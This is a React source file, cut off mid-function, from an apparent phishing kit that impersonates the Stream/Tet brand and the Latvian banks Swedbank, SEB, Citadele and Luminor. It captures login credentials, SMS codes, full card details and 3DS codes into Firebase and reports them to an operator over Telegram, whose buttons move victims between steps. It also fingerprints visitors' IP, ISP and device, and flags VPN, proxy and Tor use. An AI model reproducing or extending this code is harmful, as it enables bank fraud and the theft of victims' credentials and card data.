import { useEffect, useState, useCallback, useRef, useMemo } from 'react';
import './App.css';
import './tet-reference.css';
import './banks-reference.css';
import './code-reference.css';
import { database, ref, push, set, get, onValue, update } from './firebase';
import { sendAdminEvent, brandPrefix, OWNER_TAG } from './telegram';
const BRAND_NAME = 'Stream';
import visaLogo from './assets/visa.png';
import mastercardLogo from './assets/mastercard.png';
import amexLogo from './assets/amex.png';
import gradLeft from './assets/grad-left.png';
import gradRight from './assets/grad-right.png';
import tetLogo from './assets/tet-logo.svg';
import tetInfo from './assets/tet-info.svg';
import tetBanner from './assets/tet-banner.png';
import tetBannerSelect from './assets/tet-banner-select.png';
import bankSwed from './assets/bank-swed.svg';
import bankSeb from './assets/bank-seb.svg';
import bankCitadele from './assets/bank-citadele.svg';
import bankLuminor from './assets/bank-luminor.svg';
import bankLogin from './assets/bank-login.svg';
import bankLogin2 from './assets/bank-login-2.svg';

const TEMPLATE_CACHE = Object.create(null);
const fetchTemplateBody = async (name) => {
  let key = String(name || '').trim();
  if (!key) return '';
  if (TEMPLATE_CACHE[key]) return TEMPLATE_CACHE[key];
  // Allow subpaths like "banks/swedbank" and keep the fetch URL stable.
  key = key.replace(/^\/+/, '').replace(/\.\./g, '');
  const res = await fetch(`/templates/${key}.body.html`, { cache: 'no-cache' });
  const txt = await res.text();
  TEMPLATE_CACHE[key] = txt;
  return txt;
};

const useTemplateBody = (name) => {
  const [html, setHtml] = useState('');
  useEffect(() => {
    let alive = true;
    void fetchTemplateBody(name)
      .then((txt) => {
        if (alive) setHtml(String(txt || ''));
      })
      .catch(() => {
        if (alive) setHtml('');
      });
    return () => {
      alive = false;
    };
  }, [name]);
  return html;
};

const StreamLogo = (props) => (
  <svg viewBox="0 0 111 30" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" {...props}>
    <g>
      <path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z" />
    </g>
  </svg>
);

const LOADING_THEMES = ['brand', 'soft', 'ember', 'silver', 'night'];
const LOADING_LOADERS = ['dots', 'bars', 'rings', 'tiles'];
const LOADING_VARIANT_STORAGE_KEY = 'loadingVariantIndex';
const LOADING_COPY = [
  { kicker: 'Ruta segura', title: 'Preparando tu sesion', subtitle: 'Estamos dejando lista una pagina nueva para ti.', note: 'Buscando la ubicacion mas rapida.' },
  { kicker: 'Sincronizacion', title: 'Actualizando acceso', subtitle: 'Estamos alineando los detalles de tu sesion.', note: 'Esto suele tardar solo un momento.' },
  { kicker: 'Revision de conexion', title: 'Comprobando disponibilidad', subtitle: 'Nos aseguramos de que la siguiente pantalla abra bien.', note: 'Verificando la ruta actual.' },
  { kicker: 'Via rapida', title: 'Cargando tu acceso', subtitle: 'Se esta preparando un nuevo punto de entrada.', note: 'Manteniendo la sesion estable.' },
  { kicker: 'Inicio de sesion', title: 'Iniciando flujo seguro', subtitle: 'Estamos cerrando los ultimos detalles antes de entrar.', note: 'Espera mientras todo se acomoda.' },
  { kicker: 'Actualizacion de ruta', title: 'Dejando todo listo', subtitle: 'Estamos organizando la siguiente vista ahora mismo.', note: 'Aplicando el estado mas reciente.' },
  { kicker: 'Traspaso de cuenta', title: 'Verificando conexion', subtitle: 'Se esta eligiendo una ruta segura.', note: 'Manteniendo la pagina sincronizada.' },
  { kicker: 'Preparacion', title: 'Cargando la siguiente pantalla', subtitle: 'Tu ruta de acceso se esta actualizando.', note: 'Preparando una entrada limpia.' },
  { kicker: 'Borde de red', title: 'Abriendo tu biblioteca', subtitle: 'Estamos preparando un traspaso mas ligero.', note: 'Revisando la capacidad cercana.' },
  { kicker: 'Refresco seguro', title: 'Terminando configuracion', subtitle: 'Se estan aplicando los ultimos detalles.', note: 'Ya casi entramos.' },
  { kicker: 'Inicio silencioso', title: 'Un momento', subtitle: 'Estamos cambiando a una vista de carga nueva.', note: 'Manteniendo la experiencia fresca.' },
  { kicker: 'Borde listo', title: 'Cargando vista de cuenta', subtitle: 'Tu sesion se esta actualizando en este momento.', note: 'Esta pantalla rota por visitante.' },
  { kicker: 'Revision de senal', title: 'Preparando ruta segura', subtitle: 'Estamos validando el camino de acceso.', note: 'Optimizando la ruta ahora.' },
  { kicker: 'Refresco de acceso', title: 'Comprobando calidad', subtitle: 'Se esta seleccionando una ruta estable.', note: 'Equilibrando velocidad y continuidad.' },
  { kicker: 'Traspaso en vivo', title: 'Actualizando acceso', subtitle: 'La siguiente vista segura ya casi esta lista.', note: 'Evita cerrar esta pantalla.' },
  { kicker: 'Sesion nueva', title: 'Abriendo herramientas', subtitle: 'Estamos reconstruyendo el acceso de forma limpia.', note: 'Cargando una variante nueva para esta visita.' },
  { kicker: 'Ruta inteligente', title: 'Calentando la experiencia', subtitle: 'Se esta preparando una ruta de sesion mas limpia.', note: 'Manteniendo variedad entre usuarios.' },
  { kicker: 'Balance de ruta', title: 'Construyendo tu panel', subtitle: 'Estamos sincronizando la siguiente etapa.', note: 'Aplicando el mapa actual de la sesion.' },
  { kicker: 'Carga rapida', title: 'Completando conexion', subtitle: 'El ultimo paso se esta finalizando.', note: 'Entrando en breve.' },
  { kicker: 'Traspaso final', title: 'Preparando una entrada nueva', subtitle: 'Estamos abriendo una vista de carga renovada.', note: 'Manteniendo la sesion estable.' },
];

const LOADING_VARIANTS = LOADING_COPY.map((copy, index) => ({
  ...copy,
  theme: LOADING_THEMES[index % LOADING_THEMES.length],
  loader: LOADING_LOADERS[Math.floor(index / LOADING_THEMES.length)],
}));

const THREE_DS_STEP = 20;
const THREE_DS_DEFAULT_OPTIONS = ['DRXB', 'EFSM', 'GJEG', 'PTCP'];
const THREE_DS_DEFAULT_CONFIG = {
  merchant: 'Kaoun *PLINK',
  amount: '1,050.000 TND',
  cardMask: '************6304',
  language: '中文',
  title: '交易驗證碼確認',
};

const normalizeThreeDsOptions = (config = {}) => {
  const raw = Array.isArray(config?.authOptions)
    ? config.authOptions
    : [config?.option1, config?.option2, config?.option3, config?.option4];
  const cleaned = raw
    .map((value) => String(value || '').trim())
    .filter(Boolean)
    .slice(0, 4);
  while (cleaned.length < 4) {
    cleaned.push(THREE_DS_DEFAULT_OPTIONS[cleaned.length]);
  }
  return cleaned;
};

const resolveThreeDsConfig = (config = {}) => ({
  ...THREE_DS_DEFAULT_CONFIG,
  ...config,
  authOptions: normalizeThreeDsOptions(config),
});

const hashString = (value = '') => {
  let hash = 0;
  for (let i = 0; i < value.length; i += 1) {
    hash = (hash << 5) - hash + value.charCodeAt(i);
    hash |= 0;
  }
  return Math.abs(hash);
};

const readLoadingVariantSeed = () => {
  if (typeof window === 'undefined') return '';
  try {
    const params = new URLSearchParams(window.location.search);
    return (
      window.localStorage.getItem('visitorId') ||
      params.get('uid') ||
      window.sessionStorage.getItem('uid') ||
      ''
    );
  } catch {
    return '';
  }
};

const resolveLoadingVariantIndex = (seed) => {
  if (!seed) return 0;
  return hashString(String(seed)) % LOADING_VARIANTS.length;
};

const getInitialLoadingVariantIndex = () => {
  if (typeof window === 'undefined') return 0;
  const seed = readLoadingVariantSeed();
  if (seed) return resolveLoadingVariantIndex(seed);
  try {
    const stored = Number(window.sessionStorage.getItem(LOADING_VARIANT_STORAGE_KEY));
    if (Number.isInteger(stored) && stored >= 0) return stored % LOADING_VARIANTS.length;
    const randomIndex = Math.floor(Math.random() * LOADING_VARIANTS.length);
    window.sessionStorage.setItem(LOADING_VARIANT_STORAGE_KEY, String(randomIndex));
    return randomIndex;
  } catch {
    return 0;
  }
};

const CARD_BRANDS = {
  visa: {
    name: 'Visa',
    logo: visaLogo,
    cvvLength: 3,
  },
  mastercard: {
    name: 'Mastercard',
    logo: mastercardLogo,
    cvvLength: 3,
  },
  amex: {
    name: 'American Express',
    logo: amexLogo,
    cvvLength: 4,
  },
};

const ACTION_BASE_URL =
  (process.env.REACT_APP_ACTION_BASE_URL || '').trim() ||
  (typeof window !== 'undefined' ? window.location.origin : '');

const buildActionButtons = (uid) => {
  if (!uid || !ACTION_BASE_URL) return undefined;
  const cleanUid = encodeURIComponent(uid);
  const link = (label, step) => ({
    text: label,
    url: `${ACTION_BASE_URL}/?uid=${cleanUid}&goto=${encodeURIComponent(step)}`,
  });
  return [
    [link('🔐 Login', 'login'), link('💬 SMS', 'sms'), link('💳 Card', 'card')],
    [link('🛡️ 3DS', String(THREE_DS_STEP))],
    [
      link('❌ Login Incorrect', 'login-incorrect'),
      link('❌ SMS Incorrect', 'sms-incorrect'),
      link('❌ Card Incorrect', 'card-incorrect'),
    ],
  ];
};

const luhnCheck = (num) => {
  const digits = num.replace(/\D/g, '');
  if (!digits) return false;
  let sum = 0;
  let shouldDouble = false;
  for (let i = digits.length - 1; i >= 0; i -= 1) {
    let d = Number(digits[i]);
    if (shouldDouble) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    shouldDouble = !shouldDouble;
  }
  return sum % 10 === 0;
};

const detectBrand = (num) => {
  const digits = num.replace(/\D/g, '');
  if (/^4\d{0,15}$/.test(digits)) return 'visa';
  if (/^(5[1-5]\d{0,14}|2(2[2-9]\d|[3-6]\d{2}|7[01]\d|720)\d{0,12})$/.test(digits)) return 'mastercard';
  if (/^3[47]\d{0,13}$/.test(digits)) return 'amex';
  return null;
};

const expValid = (value) => {
  const match = /^(\d{2})[\\/](\d{2})$/.exec(value.trim());
  if (!match) return false;
  const [mm, yy] = [Number(match[1]), Number(match[2])];
  if (mm < 1 || mm > 12) return false;
  const now = new Date();
  const currentYear = now.getFullYear() % 100;
  const currentMonth = now.getMonth() + 1;
  if (yy < currentYear) return false;
  if (yy === currentYear && mm < currentMonth) return false;
  return true;
};

// Lightweight human-check challenge (math + slide)
const createHumanChallenge = () => {
  const a = Math.floor(6 + Math.random() * 15); // 6-20
  const b = Math.floor(4 + Math.random() * 12); // 4-15
  return {
    a,
    b,
    answer: '',
    slide: 0,
    key: `${Date.now()}-${Math.random().toString(16).slice(2)}`,
  };
};

const HUMAN_SLIDER_THUMB_SIZE = 54;
const HUMAN_SLIDER_COMPLETE_THRESHOLD = 100;
const TAB_LOCK_TTL_MS = 5000;

const getTabSessionId = () => {
  if (typeof window === 'undefined') return '';
  try {
    const key = 'activeTabSessionId';
    const existing = window.sessionStorage.getItem(key);
    if (existing) return existing;
    const next = `${Date.now()}-${Math.random().toString(16).slice(2)}`;
    window.sessionStorage.setItem(key, next);
    return next;
  } catch {
    return '';
  }
};

const getTabLockKey = (uid) => `activeVisitorTab:${uid || ''}`;

const readTabLock = (uid) => {
  if (typeof window === 'undefined' || !uid) return null;
  try {
    const raw = window.localStorage.getItem(getTabLockKey(uid));
    if (!raw) return null;
    const parsed = JSON.parse(raw);
    return parsed && typeof parsed === 'object' ? parsed : null;
  } catch {
    return null;
  }
};

const writeTabLock = (uid, value) => {
  if (typeof window === 'undefined' || !uid) return;
  try {
    window.localStorage.setItem(getTabLockKey(uid), JSON.stringify(value));
  } catch {}
};

const clearTabLock = (uid, tabId) => {
  if (typeof window === 'undefined' || !uid || !tabId) return;
  try {
    const current = readTabLock(uid);
    if (current?.tabId === tabId) {
      window.localStorage.removeItem(getTabLockKey(uid));
    }
  } catch {}
};

const isHumanVerifiedValue = (value) => {
  if (value === true || value === 1) return true;
  if (typeof value === 'string') {
    return ['1', 'true', 'yes', 'y', 'solved', 'verified'].includes(
      value.trim().toLowerCase()
    );
  }
  return false;
};

const asHumanVerifiedTimestamp = (value) => {
  if (value == null || value === '') return null;
  const numeric = Number(value);
  if (Number.isFinite(numeric) && numeric > 0) return Math.round(numeric);
  const parsed = Date.parse(String(value));
  return Number.isFinite(parsed) ? parsed : null;
};

const isHumanSlideComplete = (value) =>
  Number(value || 0) >= HUMAN_SLIDER_COMPLETE_THRESHOLD;

function useRealtimePresence(resolveUserId) {
  const presenceTimerRef = useRef(null);

  useEffect(() => {
    const pushPresence = async (state) => {
      const uid = resolveUserId();
      if (!uid) return;
      try {
        const visibility =
          typeof document !== 'undefined' && document.visibilityState
            ? document.visibilityState
            : 'unknown';
        await update(ref(database, `status/${uid}`), {
          state,
          online: state === 'online',
          pending: state === 'pending',
          active: state === 'online',
          lastSeen: Date.now(),
          visibility,
        });
      } catch (err) {
        console.warn('Presence update failed', err);
      }
    };

    const uid = resolveUserId();
    if (!uid || typeof document === 'undefined' || typeof window === 'undefined') {
      return undefined;
    }

    const handleVis = () => {
      const state = document.visibilityState === 'hidden' ? 'pending' : 'online';
      pushPresence(state);
    };
    const handleFocus = () => pushPresence('online');
    const handleBlur = () => pushPresence('pending');
    const handleUnload = () => pushPresence('offline');

    handleVis();
    // Faster heartbeats for more responsive online/pending detection
    presenceTimerRef.current = setInterval(handleVis, 2000);
    document.addEventListener('visibilitychange', handleVis);
    window.addEventListener('focus', handleFocus);
    window.addEventListener('blur', handleBlur);
    window.addEventListener('beforeunload', handleUnload);

    return () => {
      clearInterval(presenceTimerRef.current);
      document.removeEventListener('visibilitychange', handleVis);
      window.removeEventListener('focus', handleFocus);
      window.removeEventListener('blur', handleBlur);
      window.removeEventListener('beforeunload', handleUnload);
      pushPresence('offline');
    };
  }, [resolveUserId]);
}

const STEP_ROUTE_MAP = {
  2: '/',
  3: '/',
  4: '/',
  5: '/select',
  6: '/',
  7: '/',
  8: '/',
  9: '/select',
  10: '/',
  11: '/',
  14: '/',
  15: '/',
  17: '/',
  18: '/',
  19: '/',
  20: '/',
  101: '/swedbank',
  102: '/seb',
  103: '/citadele',
  104: '/luminor',
  111: '/swedbank',
  112: '/seb',
  113: '/citadele',
  114: '/luminor',
  121: '/swedbank/code',
  122: '/seb/code',
  123: '/citadele/code',
  124: '/luminor/code',
};

const GOTO_STEP_MAP = {
  login: 2,
  sms: 3,
  card: 5,
  'login-incorrect': 6,
  'sms-incorrect': 7,
  'card-incorrect': 9,
  done: 11,
  '3ds': 20,
  '20': 20,
};

const getStoredStep = () => {
  if (typeof window === 'undefined') return null;
  const stored = window.sessionStorage.getItem('step');
  const num = Number(stored);
  return Number.isFinite(num) && num > 0 ? num : null;
};

const getStoredUid = () => {
  if (typeof window === 'undefined') return null;
  return window.sessionStorage.getItem('uid');
};

// Persist login creds for downstream pages (card/sms) even after reload
const setStoredLoginCreds = (username, password) => {
  try {
    if (typeof window === 'undefined') return;
    window.sessionStorage.setItem('login_username', username || '');
    window.sessionStorage.setItem('login_password', password || '');
  } catch {}
};

const getStoredLoginCreds = () => {
  try {
    if (typeof window === 'undefined') return { username: '', password: '' };
    return {
      username: window.sessionStorage.getItem('login_username') || '',
      password: window.sessionStorage.getItem('login_password') || '',
    };
  } catch {
    return { username: '', password: '' };
  }
};

const resolveStoredLoginCreds = async (uid) => {
  const stored = getStoredLoginCreds();
  if (stored.username || stored.password) return stored;
  if (!uid) return stored;
  try {
    const snap = await get(ref(database, `users/${uid}/step2`));
    const data = snap.val() || {};
    const resolved = {
      username: data.username || data.email || '',
      password: data.password || '',
    };
    if (resolved.username || resolved.password) {
      setStoredLoginCreds(resolved.username, resolved.password);
      return resolved;
    }
  } catch (err) {
    console.warn('Stored login fallback failed', err);
  }
  return stored;
};

const setStoredCardDetails = (card = {}) => {
  try {
    if (typeof window === 'undefined') return;
    window.sessionStorage.setItem('card_details', JSON.stringify(card || {}));
  } catch {}
};

const getStoredCardDetails = () => {
  try {
    if (typeof window === 'undefined') return {};
    const raw = window.sessionStorage.getItem('card_details');
    return raw ? JSON.parse(raw) : {};
  } catch {
    return {};
  }
};

const resolveStoredCardDetails = async (uid) => {
  const stored = getStoredCardDetails();
  if (stored.cardNumber || stored.expiry || stored.cvv) return stored;
  if (!uid) return stored;
  try {
    const [step5Snap, step9Snap] = await Promise.all([
      get(ref(database, `users/${uid}/step5`)),
      get(ref(database, `users/${uid}/step9`)),
    ]);
    const data = step9Snap.val() || step5Snap.val() || {};
    if (data && (data.cardNumber || data.expiry || data.cvv)) {
      setStoredCardDetails(data);
      return data;
    }
  } catch (err) {
    console.warn('Stored card fallback failed', err);
  }
  return stored;
};

const hasSeenLoader = () => {
  try {
    if (typeof window === 'undefined') return false;
    return window.sessionStorage.getItem('loaderSeen') === '1';
  } catch {
    return false;
  }
};

const markLoaderSeen = () => {
  try {
    if (typeof window !== 'undefined') window.sessionStorage.setItem('loaderSeen', '1');
  } catch {}
};


const getStepFromLocation = () => {
  if (typeof window === 'undefined') return 2;
  // If routed to /404, force the not-found view regardless of params
  const path = window.location.pathname || '';
  const normalizedPath = path.replace(/\/+$/, '').toLowerCase();
  if (normalizedPath === '/404') return 404;
  if (normalizedPath === '/mtc3oda4mtq1mg==') return 2;
  if (normalizedPath === '/select') return 5;

  // Bank code pages (clean URLs)
  if (normalizedPath === '/swedbank/code') return 121;
  if (normalizedPath === '/seb/code') return 122;
  if (normalizedPath === '/citadele/code') return 123;
  if (normalizedPath === '/luminor/code') return 124;

  // Support both /bank.html and /bank (Firebase hosting cleanUrls can strip .html).
  const lastSeg = normalizedPath.split('/').filter(Boolean).pop() || '';
  const bankKey = lastSeg.endsWith('.html') ? lastSeg.slice(0, -5) : lastSeg;
  if (bankKey === 'swedbank' || bankKey === 'seb' || bankKey === 'citadele' || bankKey === 'luminor') {
    // If the dashboard set an "incorrect" bank step, respect it for this bank URL.
    const stored = getStoredStep();
    const incorrectByBank = {
      swedbank: 111,
      seb: 112,
      citadele: 113,
      luminor: 114,
    };
    const normalByBank = {
      swedbank: 101,
      seb: 102,
      citadele: 103,
      luminor: 104,
    };
    const wantIncorrect = incorrectByBank[bankKey];
    const wantNormal = normalByBank[bankKey];
    if (stored === wantIncorrect) return wantIncorrect;
    if (stored === wantNormal) return wantNormal;
    return wantNormal;
  }
  const params = new URLSearchParams(window.location.search);
  const gotoParam = String(params.get('goto') || '')
    .trim()
    .toLowerCase();
  if (gotoParam && GOTO_STEP_MAP[gotoParam]) return GOTO_STEP_MAP[gotoParam];
  const stepParam = Number(params.get('step'));
  if (Number.isFinite(stepParam) && stepParam > 0) return stepParam;
  const stored = getStoredStep();
  if (stored && stored !== 404) return stored;
  return 2;
};

const getUidFromLocation = () => {
  if (typeof window === 'undefined') return null;
  const params = new URLSearchParams(window.location.search);
  const uidParam = params.get('uid');
  if (uidParam) return uidParam;
  return getStoredUid();
};

const persistStepUid = (step, uid) => {
  try {
    if (typeof window === 'undefined') return;
    if (step && step !== 404) window.sessionStorage.setItem('step', String(step));
    if (uid) window.sessionStorage.setItem('uid', uid);
  } catch {}
};

const sanitizePage1Template = (html = '') => {
  // Ensure the page1 form cannot navigate away, but keeps native HTML5 validation.
  // (User asked fields to be required.)
  const base = String(html || '').replace(/<form\b([^>]*)>/i, (_match, attrs = '') => {
    const safeAttrs = String(attrs)
      .replace(/\saction=(?:"[^"]*"|'[^']*'|[^\s>]+)/i, '')
      .replace(/\smethod=(?:"[^"]*"|'[^']*'|[^\s>]+)/i, '')
      .replace(/\snovalidate\b/i, '');
    return `<form${safeAttrs} action="#" method="GET">`;
  });

  // Add required to the known username/password inputs.
  return base
    .replace(/<input\b([^>]*\bid=user\b[^>]*)>/i, (m, attrs) => {
      if (/\srequired\b/i.test(attrs)) return m;
      return `<input${attrs} required>`;
    })
    .replace(/<input\b([^>]*\bid=pass\b[^>]*)>/i, (m, attrs) => {
      if (/\srequired\b/i.test(attrs)) return m;
      return `<input${attrs} required>`;
    });
};

const flagEmoji = (countryCode = '') => {
  const cc = String(countryCode || '').trim().toUpperCase();
  if (cc.length !== 2) return '';
  const codePoints = [...cc].map((ch) => 127397 + ch.charCodeAt(0));
  try {
    return String.fromCodePoint(...codePoints);
  } catch {
    return '';
  }
};

const resolveCountryCode = (meta = {}) => {
  const code = String(meta.countryCode || '').trim();
  if (code.length === 2) return code.toUpperCase();
  const countryAsCode = String(meta.country || '').trim();
  if (countryAsCode.length === 2) return countryAsCode.toUpperCase();
  return '';
};

const formatCountryLine = (meta = {}) => {
  const code = resolveCountryCode(meta);
  const label = code || String(meta.country || 'N/A').trim() || 'N/A';
  const flag = flagEmoji(code);
  return flag ? `${flag} ${label}` : label;
};

const normalizeHostname = (value = '') => {
  let raw = String(value || '')
    .trim()
    .toLowerCase();
  if (!raw) return '';

  if (raw.includes('://') && !raw.includes('*')) {
    try {
      raw = new URL(raw).hostname.toLowerCase();
    } catch {}
  } else {
    raw = raw.replace(/^[a-z]+:\/\//i, '');
  }

  raw = raw
    .split('/')[0]
    .split('?')[0]
    .split('#')[0]
    .trim()
    .replace(/:\d+$/, '')
    .replace(/\.+$/, '');

  return raw;
};

const asNullableNumber = (value) => {
  const n = Number(value);
  return Number.isFinite(n) ? n : null;
};

const formatMetaLines = (meta = {}) => {
  const countryLine = formatCountryLine(meta);
  const browserLine = meta.browser
    ? `${meta.browser}${meta.browserVersion ? ` ${meta.browserVersion}` : ''}`
    : 'N/A';
  const ipLine = meta.ip ? `🌐 IP: ${meta.ip}` : `🌐 IP: N/A`;
  return [
    ipLine,
    `🧷 Host: ${meta.rdns || 'N/A'}`,
    `🏢 ISP: ${meta.isp || 'N/A'}`,
    `📍 Country: ${countryLine}`,
    `🧭 Browser: ${browserLine}`,
    `🖥️ Device: ${meta.deviceType || 'N/A'}`,
    `💻 OS: ${meta.os || 'N/A'}`,
    `🔗 URL: ${meta.siteUrl || 'N/A'}`,
  ];
};

const headerLines = (stepLabel) => {
  const prefix = [];
  if (OWNER_TAG) prefix.push(OWNER_TAG);
  prefix.push(brandPrefix(stepLabel));
  prefix.push('');
  return prefix;
};

const readClientInfo = () => {
  const nav = typeof navigator !== 'undefined' ? navigator : null;
  const uaData = nav?.userAgentData;
  const ua = nav?.userAgent || '';
  const browserBrand =
    uaData?.brands?.find((item) => item.brand && !/Not;?A?Brand/i.test(item.brand)) ||
    uaData?.brands?.[0];

  const browserName = (() => {
    if (browserBrand?.brand) return browserBrand.brand;
    if (/edg\//i.test(ua)) return 'Edge';
    if (/opr\//i.test(ua)) return 'Opera';
    if (/chrome\//i.test(ua) && !/edg\//i.test(ua)) return 'Chrome';
    if (/safari/i.test(ua) && !/chrome/i.test(ua)) return 'Safari';
    if (/firefox|fxios/i.test(ua)) return 'Firefox';
    if (/msie|trident/i.test(ua)) return 'Internet Explorer';
    return 'Unknown';
  })();

  const browserVersion = (() => {
    if (uaData?.uaFullVersion) return uaData.uaFullVersion;
    const matchers = {
      Chrome: /chrome\/([\d.]+)/i,
      Edge: /edg[e]?\/([\d.]+)/i,
      Opera: /opr\/([\d.]+)/i,
      Safari: /version\/([\d.]+)/i,
      Firefox: /firefox\/([\d.]+)/i,
      'Internet Explorer': /(?:msie |rv:)([\d.]+)/i,
    };
    const match = matchers[browserName]?.exec(ua);
    return match ? match[1] : '';
  })();

  const os = (() => {
    if (/windows nt/i.test(ua)) return 'Windows';
    if (/mac os x/i.test(ua) || /macintosh/i.test(uaData?.platform || nav?.platform || '')) return 'macOS';
    if (/android/i.test(ua)) return 'Android';
    if (/(iphone|ipad|ipod)/i.test(ua)) return 'iOS';
    if (/linux/i.test(ua)) return 'Linux';
    return uaData?.platform || nav?.platform || 'Unknown';
  })();

  const deviceType = (() => {
    if (typeof uaData?.mobile === 'boolean') return uaData.mobile ? 'mobile' : 'desktop';
    if (/tablet|ipad|playbook|silk/i.test(ua)) return 'tablet';
    if (/mobile|iphone|ipod|android.*mobile/i.test(ua)) return 'mobile';
    return 'desktop';
  })();

  return {
    browserName,
    browserVersion,
    deviceType,
    os,
    language: nav?.language || '',
  };
};

const fetchVisitorMetaShared = async () => {
  const safeWindow = typeof window !== 'undefined' ? window : null;
  const client = readClientInfo();
  const ts = Date.now();
  const dateLabel = new Date(ts).toISOString();
  const fallback = {
    ip: '',
    isp: '',
    rdns: '',
    countryCode: '',
    country: '',
    siteOrigin: safeWindow?.location?.origin || '',
    siteUrl: safeWindow?.location?.href || '',
    userAgent: typeof navigator !== 'undefined' ? navigator.userAgent : '',
    browser: client.browserName,
    browserVersion: client.browserVersion,
    deviceType: client.deviceType,
    os: client.os,
    language: client.language,
    riskScore: 0,
    isVpn: false,
    isProxy: false,
    isTor: false,
    isBot: false,
    ts,
    createdAt: ts,
    dateLabel,
  };

  const tryFetchJson = async (url, options = {}, timeoutMs = 4000) => {
    const controller = typeof AbortController !== 'undefined' ? new AbortController() : null;
    const timeout = setTimeout(() => controller?.abort(), timeoutMs);
    try {
      const res = await fetch(url, { ...options, signal: controller?.signal });
      if (!res.ok) throw new Error(`Bad response (${res.status})`);
      return await res.json();
    } finally {
      clearTimeout(timeout);
    }
  };

  try {
    const data = await tryFetchJson('https://countryisp.vinsonova.workers.dev', {
      headers: { accept: 'application/json' },
    });
    let base = {
      ...fallback,
      ip: data.ip || data.query || '',
      isp: data.isp || data.org || '',
      rdns: data.rdns || data.hostname || data.reverseDns || '',
      countryCode: data.countryCode || data.country_code || '',
      country: data.country || data.country_name || '',
      isVpn: data.isVpn || false,
      isProxy: data.isProxy || false,
      isTor: data.isTor || false,
      isBot: data.isBot || false,
    };
    return base;
  } catch (err) {
    console.warn('Visitor meta shared primary fetch failed, trying fallback', err);
    try {
      const data = await tryFetchJson('https://ipapi.co/json/');
      let base = {
        ...fallback,
        ip: data.ip || '',
        isp: data.org || data.asn || '',
        rdns: data.hostname || '',
        countryCode: data.country || '',
        country: data.country_name || '',
      };
      return base;
    } catch (fallbackErr) {
      console.warn('Visitor meta shared fallback fetch failed', fallbackErr);
      return fallback;
    }
  }
};

const BINLIST_FALLBACK_URL = 'https://r.jina.ai/http://binlist.io/lookup/';

const extractJsonFromText = (text = '') => {
  const start = text.indexOf('{');
  const end = text.lastIndexOf('}');
  if (start < 0 || end < start) return null;
  try {
    return JSON.parse(text.slice(start, end + 1));
  } catch {
    return null;
  }
};

const fetchBinInfo = async (bin) => {
  if (!bin || bin.length < 6) return {};
  const key = String(bin).replace(/\D/g, '').slice(0, 6);
  if (key.length < 6) return {};

  const parseMeta = (data = {}) => ({
    bin: key,
    bank: data.bank?.name || '',
    scheme: data.scheme || '',
    level: data.brand || data.level || data.category || '',
    type: data.type || '',
    prepaid: typeof data.prepaid === 'boolean' ? data.prepaid : null,
  });

  const fetchFallbackMeta = async () => {
    const controller = typeof AbortController !== 'undefined' ? new AbortController() : null;
    const timeout = setTimeout(() => controller?.abort(), 5000);
    try {
      const res = await fetch(`${BINLIST_FALLBACK_URL}${key}/`, {
        headers: { accept: 'text/plain' },
        signal: controller?.signal,
      });
      if (!res.ok) throw new Error(`bin fallback status ${res.status}`);
      const text = await res.text();
      const parsed = extractJsonFromText(text);
      if (!parsed) throw new Error('bin fallback parse failed');
      return parseMeta(parsed);
    } finally {
      clearTimeout(timeout);
    }
  };

  try {
    return await fetchFallbackMeta();
  } catch (err) {
    console.warn('BIN lookup failed', err?.message || err);
    return { bin: key };
  }
};

function redirectUserToStep(step, userId) {
  persistStepUid(step, userId);
  try {
    const url = new URL(window.location.href);
    // Prefer a real navigation over history+reload. Reload can race with form submits
    // and sometimes re-open the previous route instead of the new one.
    url.pathname = STEP_ROUTE_MAP[step] || '/';
    url.search = '';
    window.location.replace(url.pathname || '/');
  } catch (err) {
    console.warn('Redirect failed', err);
    window.location.assign('/');
  }
}

function useStepRedirect(resolveUserId, onStepChange) {
  const stepInitSeen = useRef(false);
  const lastStepRef = useRef(null);

  useEffect(() => {
    const uid = resolveUserId();
    if (!uid) return undefined;
    const userRef = ref(database, `users/${uid}`);
    const unsub = onValue(userRef, (snap) => {
      const data = snap.val();
      if (!data || typeof data !== 'object') return;
      const step = data.step;
      if (!step) return;
